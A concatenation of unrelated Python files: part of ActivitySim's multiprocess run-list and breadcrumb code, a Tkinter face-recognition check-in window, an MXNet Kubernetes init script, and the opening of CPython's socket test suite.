* allocate shared data buffers for skims and shadow_pricing
* load shared skim data from OMX files
* run each (single or multiprocess) step in turn
Drop breadcrumbs along the way to facilitate resuming in a later run
Parameters
----------
injectables : dict
dict of values to inject in sub-processes
"""
mem.trace_memory_info("run_multiprocess.start")
run_list = get_run_list()
if not run_list['multiprocess']:
raise RuntimeError("run_multiprocess called but multiprocess flag is %s" %
run_list['multiprocess'])
old_breadcrumbs = run_list.get('breadcrumbs', {})
# raise error if any sub-process fails without waiting for others to complete
fail_fast = setting('fail_fast')
info(f"run_multiprocess fail_fast: {fail_fast}")
def skip_phase(phase):
skip = old_breadcrumbs and old_breadcrumbs.get(step_name, {}).get(phase, False)
if skip:
info(f"Skipping {step_name} {phase}")
return skip
def find_breadcrumb(crumb, default=None):
return old_breadcrumbs.get(step_name, {}).get(crumb, default)
# - allocate shared data
shared_data_buffers = {}
mem.trace_memory_info("allocate_shared_skim_buffer.before")
t0 = tracing.print_elapsed_time()
shared_data_buffers.update(allocate_shared_skim_buffers())
t0 = tracing.print_elapsed_time('allocate shared skim buffer', t0)
mem.trace_memory_info("allocate_shared_skim_buffer.completed")
# combine shared_skim_buffer and shared_shadow_pricing_buffer in shared_data_buffer
t0 = tracing.print_elapsed_time()
shared_data_buffers.update(allocate_shared_shadow_pricing_buffers())
t0 = tracing.print_elapsed_time('allocate shared shadow_pricing buffer', t0)
mem.trace_memory_info("allocate_shared_shadow_pricing_buffers.completed")
# - mp_setup_skims
if len(shared_data_buffers) > 0:
run_sub_task(
multiprocessing.Process(
target=mp_setup_skims, name='mp_setup_skims', args=(injectables,),
kwargs=shared_data_buffers)
)
t0 = tracing.print_elapsed_time('setup shared_data_buffers', t0)
mem.trace_memory_info("mp_setup_skims.completed")
# - for each step in run list
for step_info in run_list['multiprocess_steps']:
step_name = step_info['name']
num_processes = step_info['num_processes']
slice_info = step_info.get('slice', None)
if num_processes == 1:
sub_proc_names = [step_name]
else:
sub_proc_names = ["%s_%s" % (step_name, i) for i in range(num_processes)]
# - mp_apportion_pipeline
if not skip_phase('apportion') and num_processes > 1:
run_sub_task(
multiprocessing.Process(
target=mp_apportion_pipeline, name='%s_apportion' % step_name,
args=(injectables, sub_proc_names, step_info))
)
drop_breadcrumb(step_name, 'apportion')
# - run_sub_simulations
if not skip_phase('simulate'):
resume_after = step_info.get('resume_after', None)
previously_completed = find_breadcrumb('completed', default=[])
completed = run_sub_simulations(injectables,
shared_data_buffers,
step_info,
sub_proc_names,
resume_after, previously_completed, fail_fast)
if len(completed) != num_processes:
raise RuntimeError("%s processes failed in step %s" %
(num_processes - len(completed), step_name))
drop_breadcrumb(step_name, 'simulate')
# - mp_coalesce_pipelines
if not skip_phase('coalesce') and num_processes > 1:
run_sub_task(
multiprocessing.Process(
target=mp_coalesce_pipelines, name='%s_coalesce' % step_name,
args=(injectables, sub_proc_names, slice_info))
)
drop_breadcrumb(step_name, 'coalesce')
# add checkpoint with final tables even if not intermediate checkpointing
if not pipeline.intermediate_checkpoint():
pipeline.open_pipeline('_')
pipeline.add_checkpoint(pipeline.FINAL_CHECKPOINT_NAME)
pipeline.close_pipeline()
mem.log_global_hwm() # main process
def get_breadcrumbs(run_list):
"""
Read, validate, and annotate breadcrumb file from previous run
if resume_after specifies a model name, we need to determine which step it falls within,
drop any subsequent steps, and set the 'simulate' and 'coalesce' breadcrumbs to None so those phases will be rerun
Extract from breadcrumbs file showing completed mp_households step with 2 processes:
::
- apportion: true
completed: [mp_households_0, mp_households_1]
name: mp_households
simulate: true
coalesce: true
Parameters
----------
run_list : dict
validated and annotated run_list from settings
Returns
-------
breadcrumbs : dict
validated and annotated breadcrumbs file from previous run
"""
resume_after = run_list['resume_after']
assert resume_after is not None
# - read breadcrumbs file from previous run
breadcrumbs = read_breadcrumbs()
# - can't resume multiprocess without breadcrumbs file
if not breadcrumbs:
error(f"empty breadcrumbs for resume_after '{resume_after}'")
raise RuntimeError("empty breadcrumbs for resume_after '%s'" % resume_after)
# if resume_after is specified by name
if resume_after != LAST_CHECKPOINT:
# breadcrumbs for steps from previous run
previous_steps = list(breadcrumbs.keys())
# find the run_list step resume_after is in
resume_step = next((step for step in run_list['multiprocess_steps']
if resume_after in step['models']), None)
resume_step_name = resume_step['name']
if resume_step_name not in previous_steps:
error(f"resume_after model '{resume_after}' not in breadcrumbs")
raise RuntimeError("resume_after model '%s' not in breadcrumbs" % resume_after)
# drop any previous_breadcrumbs steps after resume_step
for step in previous_steps[previous_steps.index(resume_step_name) + 1:]:
del breadcrumbs[step]
# if resume_after is not the last model in the step
# then we need to rerun the simulations in that step, even if they succeeded
if resume_after in resume_step['models'][:-1]:
if 'simulate' in breadcrumbs[resume_step_name]:
breadcrumbs[resume_step_name]['simulate'] = None
if 'coalesce' in breadcrumbs[resume_step_name]:
breadcrumbs[resume_step_name]['coalesce'] = None
multiprocess_step_names = [step['name'] for step in run_list['multiprocess_steps']]
if list(breadcrumbs.keys()) != multiprocess_step_names[:len(breadcrumbs)]:
raise RuntimeError("last run steps don't match run list: %s" %
list(breadcrumbs.keys()))
return breadcrumbs
def get_run_list():
"""
validate and annotate run_list from settings
Assign defaults to missing settings (e.g. chunk_size)
Build individual step model lists based on step starts
If resuming, read breadcrumbs file for info on previous run execution status
# annotated run_list with two steps, the second with 2 processes
::
resume_after: None
multiprocess: True
models:
- initialize_landuse
- compute_accessibility
- initialize_households
- school_location
- workplace_location
multiprocess_steps:
step: mp_initialize
begin: initialize_landuse
name: mp_initialize
models:
- initialize_landuse
- compute_accessibility
- initialize_households
num_processes: 1
chunk_size: 0
step_num: 0
step: mp_households
begin: school_location
slice: {'tables': ['households', 'persons']}
name: mp_households
models:
- school_location
- workplace_location
num_processes: 2
chunk_size: 10000
step_num: 1
Returns
-------
run_list : dict
validated and annotated run_list
"""
models = setting('models', [])
multiprocess_steps = setting('multiprocess_steps', [])
resume_after = inject.get_injectable('resume_after', None) or setting('resume_after', None)
multiprocess = inject.get_injectable('multiprocess', False) or setting('multiprocess', False)
# default settings that can be overridden by settings in individual steps
global_chunk_size = setting('chunk_size', 0) or 0
default_mp_processes = setting('num_processes', 0) or int(1 + multiprocessing.cpu_count() / 2.0)
if multiprocess and multiprocessing.cpu_count() == 1:
warning("Can't multiprocess because there is only 1 cpu")
run_list = {
'models': models,
'resume_after': resume_after,
'multiprocess': multiprocess,
# 'multiprocess_steps': multiprocess_steps # add this later if multiprocess
}
if not models or not isinstance(models, list):
raise RuntimeError('No models list in settings file')
if resume_after == models[-1]:
raise RuntimeError("resume_after '%s' is last model in models list" % resume_after)
if multiprocess:
if not multiprocess_steps:
raise RuntimeError("multiprocess setting is %s but no multiprocess_steps setting" %
multiprocess)
# check step name, num_processes, chunk_size and presence of slice info
num_steps = len(multiprocess_steps)
step_names = set()
for istep in range(num_steps):
step = multiprocess_steps[istep]
step['step_num'] = istep
# - validate step name
name = step.get('name', None)
if not name:
raise RuntimeError("missing name for step %s"
" in multiprocess_steps" % istep)
if name in step_names:
raise RuntimeError("duplicate step name %s"
" in multiprocess_steps" % name)
if name in models:
raise RuntimeError(f"multiprocess_steps step name '{name}' cannot also be a model name")
step_names.add(name)
# - validate num_processes and assign default
num_processes = step.get('num_processes', 0)
if not isinstance(num_processes, int) or num_processes < 0:
raise RuntimeError("bad value (%s) for num_processes for step %s"
" in multiprocess_steps" % (num_processes, name))
if 'slice' in step:
if num_processes == 0:
num_processes = default_mp_processes
info(f"Setting num_processes = {num_processes} for step {name}")
if num_processes > multiprocessing.cpu_count():
warning(f"num_processes setting ({num_processes}) "
f"greater than cpu count ({ multiprocessing.cpu_count()})")
else:
if num_processes == 0:
num_processes = 1
if num_processes > 1:
raise RuntimeError("num_processes > 1 but no slice info for step %s"
" in multiprocess_steps" % name)
multiprocess_steps[istep]['num_processes'] = num_processes
# - validate chunk_size and assign default
chunk_size = step.get('chunk_size', None)
if chunk_size is None:
if global_chunk_size > 0 and num_processes > 1:
chunk_size = int(round(global_chunk_size / num_processes))
chunk_size = max(chunk_size, 1)
else:
chunk_size = global_chunk_size
multiprocess_steps[istep]['chunk_size'] = chunk_size
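# Illustrative sketch (hypothetical sizes): a step with num_processes = 4 and no step-level
# chunk_size, run with a global chunk_size of 2_000_000_000, gets
# int(round(2_000_000_000 / 4)) == 500_000_000 per process, while a single-process step
# simply inherits the global chunk_size unchanged.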
# - determine index in models list of step starts
start_tag = 'begin'
starts = [0] * len(multiprocess_steps)
for istep in range(num_steps):
step = multiprocess_steps[istep]
name = step['name']
slice = step.get('slice', None)
if slice:
if 'tables' not in slice:
raise RuntimeError("missing tables list for step %s"
" in multiprocess_steps" % istep)
start = step.get(start_tag, None)
if not start:
raise RuntimeError("missing %s tag for step '%s' (%s)"
" in multiprocess_steps" %
(start_tag, name, istep))
if start not in models:
raise RuntimeError("%s tag '%s' for step '%s' (%s) not in models list" %
(start_tag, start, name, istep))
starts[istep] = models.index(start)
if istep == 0 and starts[istep] != 0:
raise RuntimeError("%s tag '%s' for first step '%s' (%s)"
" is not first model in models list" %
(start_tag, start, name, istep))
if istep > 0 and starts[istep] <= starts[istep - 1]:
raise RuntimeError("%s tag '%s' for step '%s' (%s)"
" falls before that of prior step in models list" %
(start_tag, start, name, istep))
# remember there should always be a final checkpoint with same name as multiprocess_step name
multiprocess_steps[istep]['last_checkpoint_in_previous_multiprocess_step'] = \
multiprocess_steps[istep - 1].get('name') if istep > 0 else None
# - build individual step model lists based on starts
starts.append(len(models)) # so last step gets remaining models in list
for istep in range(num_steps):
step_models = models[starts[istep]: starts[istep + 1]]
if step_models[-1][0] == LAST_CHECKPOINT:
raise RuntimeError("Final model '%s' in step %s models list not checkpointed" %
(step_models[-1], name))
multiprocess_steps[istep]['models'] = step_models
run_list['multiprocess_steps'] = multiprocess_steps
# - add resume breadcrumbs
if resume_after:
breadcrumbs = get_breadcrumbs(run_list)
if breadcrumbs:
run_list['breadcrumbs'] = breadcrumbs
# - add resume_after to last step
if resume_after is not None:
# get_breadcrumbs should have deleted breadcrumbs for any subsequent steps
istep = len(breadcrumbs) - 1
assert resume_after == LAST_CHECKPOINT or \
resume_after in multiprocess_steps[istep]['models']
multiprocess_steps[istep]['resume_after'] = resume_after
# - write run list to output dir
# use log_file_path so we use (optional) log subdir and prefix process name
with config.open_log_file('run_list.txt', 'w') as f:
print_run_list(run_list, f)
return run_list
def print_run_list(run_list, output_file=None):
"""
Print run_list to stdout or file (informational - not read back in)
Parameters
----------
run_list : dict
output_file : open file
"""
if output_file is None:
output_file = sys.stdout
print("resume_after:", run_list['resume_after'], file=output_file)
print("multiprocess:", run_list['multiprocess'], file=output_file)
print("models:", file=output_file)
for m in run_list['models']:
print(" - ", m, file=output_file)
# - print multiprocess_steps
if run_list['multiprocess']:
print("\nmultiprocess_steps:", file=output_file)
for step in run_list['multiprocess_steps']:
print(" step:", step['name'], file=output_file)
for k in step:
if isinstance(step[k], list):
print(" %s:" % k, file=output_file)
for v in step[k]:
print(" -", v, file=output_file)
else:
print(" %s: %s" % (k, step[k]), file=output_file)
# - print breadcrumbs
breadcrumbs = run_list.get('breadcrumbs')
if breadcrumbs:
print("\nbreadcrumbs:", file=output_file)
for step_name in breadcrumbs:
step = breadcrumbs[step_name]
print(" step:", step_name, file=output_file)
for k in step:
if isinstance(step[k], list):
print("  ", k, file=output_file)
for v in step[k]:
print("    ", v, file=output_file)
else:
print("  ", k, step[k], file=output_file)
def breadcrumbs_file_path():
# return path to breadcrumbs file in output_dir
return config.build_output_file_path('breadcrumbs.yaml')
def read_breadcrumbs():
"""
Read breadcrumbs file from previous run
write_breadcrumbs wrote OrderedDict steps as list so ordered is preserved
(step names are duplicated in steps)
Returns
-------
breadcrumbs : OrderedDict
"""
file_path = breadcrumbs_file_path()
if not os.path.exists(file_path):
raise IOError("Could not find saved breadcrumbs file '%s'" % file_path)
with open(file_path, 'r') as f:
breadcrumbs = yaml.load(f, Loader=yaml.SafeLoader)
# convert array to ordered dict keyed by step name
breadcrumbs = OrderedDict([(step['name'], step) for step in breadcrumbs])
return breadcrumbs
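# Illustrative round-trip (hypothetical content): a breadcrumbs.yaml entry
#     - name: mp_households
#       apportion: true
# is returned here as OrderedDict([('mp_households', {'name': 'mp_households', 'apportion': True})]).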
def write_breadcrumbs(breadcrumbs):
"""
Write breadcrumbs file with execution history of multiprocess run
Write steps as array so order is preserved (step names are duplicated in steps)
Extract from breadcrumbs file showing completed mp_households step with 2 processes:
::
- apportion: true
coalesce: true
completed: [mp_households_0, mp_households_1]
name: mp_households
simulate: true
Parameters
----------
breadcrumbs : OrderedDict
"""
with open(breadcrumbs_file_path(), 'w') as f:
# write ordered dict as array
breadcrumbs = [step for step in list(breadcrumbs.values())]
yaml.dump(breadcrumbs, f)
def if_sub_task(if_is, if_isnt):
"""
select one of two values depending whether current process is primary process or subtask
This is primarily intended for use in yaml files to select between (e.g.) logging levels
so main log file can display only warnings and errors from subtasks
In yaml file, it can be used like this:
level: !!python/object/apply:activitysim.core.mp_tasks.if_sub_task [WARNING, NOTSET]
Parameters
----------
if_is : (any type) value to return if process is a subtask
if_isnt : (any type) value to return if process is not a subtask
Returns
-------
(any type) (one of parameters if_is or if_isnt)
"""
return if_is if inject.get_injectable('is_sub_task', False) else if_isnt
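# Illustrative Python usage mirroring the yaml example above: choose a log level depending on
# whether we are running in a sub-process (assumes the logging module is imported by the caller):
#     file_level = if_sub_task(logging.WARNING, logging.NOTSET)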
|
w_recog.py
|
#
# Copyright (c) 2021 Takeshi Yamazaki
# This software is released under the MIT License, see LICENSE.
#
from collections import deque, Counter
import cv2
from decimal import Decimal, ROUND_HALF_UP
import numpy as np
import os
import PIL.Image, PIL.ImageTk
from playsound import playsound
import threading
import tkinter as tk
from tkinter import messagebox
from tkinter import ttk
from checklist import CheckList
from mycamera import MyCamera
from facecheck import FaceCheck
from w_base import BaseWindow
class RecogWindow(BaseWindow):
def __init__(self, master=None, auto_start=False):
super().__init__(master)
self._camera = MyCamera(width=self.settings.canvas.width, height=self.settings.canvas.height)
self.master.title("Recognition")
self._create_widgets()
files = sorted(os.listdir(self.settings.save_dir.onepic_dir_fullpath))
for f in files:
if os.path.isfile(os.path.join(self.settings.save_dir.onepic_dir_fullpath, f)):
dummy = cv2.imread(os.path.join(self.settings.save_dir.onepic_dir_fullpath, f))
break
else:
print('using camera picture for pre-recognition')
dummy = self._camera.read()
dummy = cv2.cvtColor(dummy, cv2.COLOR_BGR2RGB)
dummy = PIL.Image.fromarray(dummy)
self._fc = FaceCheck()
self._fc.setup_network(dummy_im=dummy, pre_recog=dummy)
self._cl = CheckList()
self._queue = deque([], 10)
self._identified_pause_fl = False
self._detecting = 0
if len(self._cl.get_checked_list()) > 0:
for item in self._cl.get_checked_list():
self._listbox_checked.insert(tk.END, item)
self._detecting = 2
self._switch_detection_state()
if self.settings.recognition.confirmation_sound != '':
self._sound_thread = threading.Thread(target=self._play_sound)
else:
self._sound_thread = None
self._camera.running = True
self._update()
if auto_start:
self.master.after(500, self._start_detection)
def _create_widgets(self):
padx = 30
pady = 20
ipadx = 30
ipady = 20
fontsize = self.settings.window.fontsize
s = ttk.Style()
s.configure('Inference.TLabel', font=("", 36, 'bold'), foreground='red')
s.configure('Failed.TLabel', font=("", 36, 'bold'), foreground='blue')
s.configure('Already.TLabel', font=("", 36, 'bold'), foreground='green')
# Canvas
self._canvas1 = tk.Canvas(self._frame_main, width=self.settings.canvas.width, height=self.settings.canvas.height)
self._canvas1.grid(column=0, row=0, sticky=tk.NSEW)
# Others
self._frame_others = ttk.Frame(self._frame_main)
self._frame_others.grid(column=2, row=0, sticky=tk.NSEW)
# Detection
self._frame_infer = ttk.Frame(self._frame_others)
self._frame_infer.grid(column=0, row=1, pady=pady, sticky=(tk.W, tk.E, tk.N, tk.S))
self._frame_infer_once = ttk.Frame(self._frame_infer)
self._frame_infer_once.grid(column=0, row=0, sticky=(tk.W, tk.E))
self._label_infer_pre = ttk.Label(self._frame_infer_once, text='You are :')
self._label_infer_pre.grid(column=0, row=0, sticky=tk.W)
self._frame_infer_answer = ttk.Frame(self._frame_infer_once)
self._frame_infer_answer.grid(column=0, row=1, sticky=(tk.W, tk.E))
self._label_infer = ttk.Label(self._frame_infer_answer, text='', style='Inference.TLabel')
self._label_infer.grid(column=0, row=0)
self._label_infer_prob = ttk.Label(self._frame_infer_answer, text='')
self._label_infer_prob.grid(column=0, row=1)
self._frame_infer_conf = ttk.Frame(self._frame_infer)
self._frame_infer_conf.grid(column=0, row=2, sticky=(tk.W, tk.E))
self._label_id = ttk.Label(self._frame_infer_conf, text='', style='Inference.TLabel')
self._label_id.grid(column=0, row=0)
self._label_id_name = ttk.Label(self._frame_infer_conf, text='', style='Inference.TLabel')
self._label_id_name.grid(column=0, row=1)
# Checked List
self._frame_checked = ttk.Frame(self._frame_others)
self._frame_checked.grid(column=1, row=1, padx=padx, sticky=(tk.W, tk.E, tk.N, tk.S))
self._frame_checked_inner = ttk.Frame(self._frame_checked)
self._frame_checked_inner.grid(column=0, row=0, sticky=tk.NSEW)
self._listbox_checked = tk.Listbox(self._frame_checked_inner, width=12, font=('', fontsize))
self._listbox_checked.grid(column=0, row=0, sticky=(tk.W, tk.E, tk.N, tk.S))
self._scrollbar_checked = ttk.Scrollbar(self._frame_checked_inner, orient=tk.VERTICAL, command=self._listbox_checked.yview)
self._listbox_checked['yscrollcommand'] = self._scrollbar_checked.set
self._scrollbar_checked.grid(column=1, row=0, sticky=(tk.N, tk.S))
self._button_delete = ttk.Button(self._frame_checked, text='Delete', command=self._delete_confirmation)
self._button_delete.grid(column=0, row=2, ipadx=ipadx, ipady=5, sticky=tk.EW)
# Button frame
self._frame_buttons = ttk.Frame(self._frame_others)
self._frame_buttons.grid(column=0, row=2, columnspan=2, sticky=tk.EW)
self._button_start = ttk.Button(self._frame_buttons, command=self._start_detection)
self._button_start.grid(column=0, row=0, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=tk.EW)
self._button_finish = ttk.Button(self._frame_buttons, text='Finish Check', command=self._finish_checking)
self._button_finish.grid(column=1, row=0, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=tk.EW)
self._frame_main.columnconfigure(1, minsize=30)
self._frame_main.columnconfigure(2, weight=1, minsize=400)
self._frame_main.rowconfigure(0, weight=1)
self._frame_others.columnconfigure(0, weight=1, minsize=250)
self._frame_others.rowconfigure(0, minsize=50)
self._frame_others.rowconfigure(1, weight=1)
self._frame_infer.columnconfigure(0, weight=1)
self._frame_infer.rowconfigure(0, weight=1)
self._frame_infer.rowconfigure(1, minsize=50)
self._frame_infer.rowconfigure(2, weight=1)
self._frame_infer_once.columnconfigure(0, weight=1)
self._frame_infer_conf.columnconfigure(0, weight=1)
self._frame_infer_answer.columnconfigure(0, weight=1)
self._frame_checked.columnconfigure(0, weight=1)
self._frame_checked.rowconfigure(0, weight=1)
self._frame_checked_inner.columnconfigure(0, weight=1)
self._frame_checked_inner.rowconfigure(0, weight=1)
self._frame_checked_inner.rowconfigure(1, minsize=20)
self._frame_buttons.columnconfigure(0, weight=1)
self._frame_buttons.columnconfigure(1, weight=1)
def _close(self):
self._camera.running = False
self._camera.cap.release()
self._sound_thread = None
self.master.destroy()
def _switch_detection_state(self):
# 0: not started 1: detecting 2: paused
if self._detecting == 0:
self._button_start.configure(text='Start')
self._button_finish.configure(state=tk.DISABLED)
self._label_infer.configure(text='')
self._label_infer_prob.configure(text='')
elif self._detecting == 1:
self._button_start.configure(text='Pause')
self._button_finish.configure(state=tk.NORMAL)
elif self._detecting == 2:
self._button_start.configure(text='Restart')
self._button_finish.configure(state=tk.NORMAL)
self._label_infer.configure(text='')
self._label_infer_prob.configure(text='')
def _start_detection(self):
if self._detecting == 0 or self._detecting == 2:
self._detecting = 1
elif self._detecting == 1:
self._detecting = 2
if not self._identified_pause_fl:
self._label_id.configure(text='')
self._label_id_name.configure(text='')
self._switch_detection_state()
def _finish_checking(self):
self._detecting = 0
self._switch_detection_state()
self._label_id.configure(text='')
self._label_id_name.configure(text='')
file_path = self._cl.finish_checking()
tk.messagebox.showinfo('Finish Checking', 'Result Saved : {}'.format(file_path), parent=self.master)
self._listbox_checked.delete(0, tk.END)
def _delete_confirmation(self):
index = self._listbox_checked.curselection()
if len(index) == 0:
return
name = self._listbox_checked.get(index[0])
if isinstance(name, tuple):
name = name[0]
answer = tk.messagebox.askokcancel('Delete', 'Make sure you are deleting\n\n {}\n'.format(name), parent=self.master)
if answer:
self._listbox_checked.delete(index[0])
self._cl.delete_from_checked_list(index[0])
def _update(self):
frame = self._camera.value
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image = PIL.Image.fromarray(frame)
if self._detecting == 1:
name, prob = self._fc.identify(frame, 0.6)
self._label_infer.configure(text=name)
percentage = Decimal(str(prob * 100)).quantize(Decimal('0'), rounding=ROUND_HALF_UP)
self._label_infer_prob.configure(text='( {} % )'.format(percentage))
if not self._identified_pause_fl:
if self._cl.has_name(name) and not self._cl.already_checked(name):
self._queue.append(name)
self._label_id.configure(text='')
self._label_id_name.configure(text='')
if len(self._queue) == 10:
counter = Counter(self._queue)
mc = counter.most_common()[0]
if mc[1] >= 9 and mc[0] != '':
# identified
self._label_id.configure(text='Confirmed', style='Inference.TLabel')
self._label_id_name.configure(text=mc[0], style='Inference.TLabel')
self._cl.add_to_checked(mc[0])
self._listbox_checked.insert(tk.END, mc[0])
self._identified_pause_fl = True
if self._sound_thread is not None:
self._sound_thread.start()
self.master.after(5000, self._reset_queue)
elif not self._cl.has_name(name):
if name == '':
self._queue.clear()
self._label_id.configure(text='')
self._label_id_name.configure(text='')
else:
self._label_id.configure(text='Not on', style='Failed.TLabel')
self._label_id_name.configure(text='the list', style='Failed.TLabel')
else:
self._label_id.configure(text='Already', style='Already.TLabel')
self._label_id_name.configure(text='confirmed', style='Already.TLabel')
self._photo = PIL.ImageTk.PhotoImage(image=image)
self._canvas1.create_image(self._canvas1.winfo_width() / 2, self._canvas1.winfo_height() / 2, image = self._photo, anchor=tk.CENTER)
self.master.after(self.settings.canvas.update_interval, self._update)
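# Illustrative sketch of the confirmation rule above (hypothetical name): once the 10-slot queue
# holds at least 9 entries for the same recognised name, Counter(...).most_common()[0] passes the
# (count >= 9, name != '') test, the name is added to the checked list, detection pauses via
# _identified_pause_fl, and _reset_queue is scheduled 5 seconds later.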
def _play_sound(self):
playsound(self.settings.recognition.confirmation_sound)
def _reset_queue(self):
if self._sound_thread is not None:
self._sound_thread.join()
self._sound_thread = threading.Thread(target=self._play_sound)
self._identified_pause_fl = False
self._queue.clear()
self._label_id.configure(text='')
self._label_id_name.configure(text='')
if __name__ == "__main__":
window = tk.Tk()
app = RecogWindow(master=window)
app.mainloop()
|
init.py
|
import threading
import logging
import os
import os.path
import sys
import time
logging.basicConfig(level=logging.INFO, format='%(asctime)s.%(msecs)03d %(module)s %(levelname)s: %(message)s', datefmt="%Y-%m-%d %H:%M:%S")
def main():
logging.info("start init process ...")
logging.info("start training thread ...")
train = threading.Thread(target=(lambda: os.system("python /start.py")), args=())
train.daemon = True
train.start()
logging.info("start speed monitor thread ...")
speed_monitor = threading.Thread(target=(lambda: os.system("python /speed-monitor.py")), args=())
speed_monitor.daemon = True
speed_monitor.start()
logging.info("start progress monitor thread ...")
progress_monitor = threading.Thread(target=(lambda: os.system("python /progress-monitor.py")), args=())
progress_monitor.daemon = True
progress_monitor.start()
while True:
time.sleep(60)
if __name__ == '__main__':
if len(sys.argv) != 1:
print "Description: MXNet init script in k8s cluster"
print "Usage: python init.py"
sys.exit(1)
main()
|
test_socket.py
|
import unittest
from test import support
from test.support import socket_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
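# Illustrative usage (not part of the test suite): apply a module-wide default timeout for the
# duration of a block and have the previous value restored even if the body raises:
#     with socket_setdefaulttimeout(5.0):
#         s = socket.socket()   # new sockets created here get a 5.0 second timeout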
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
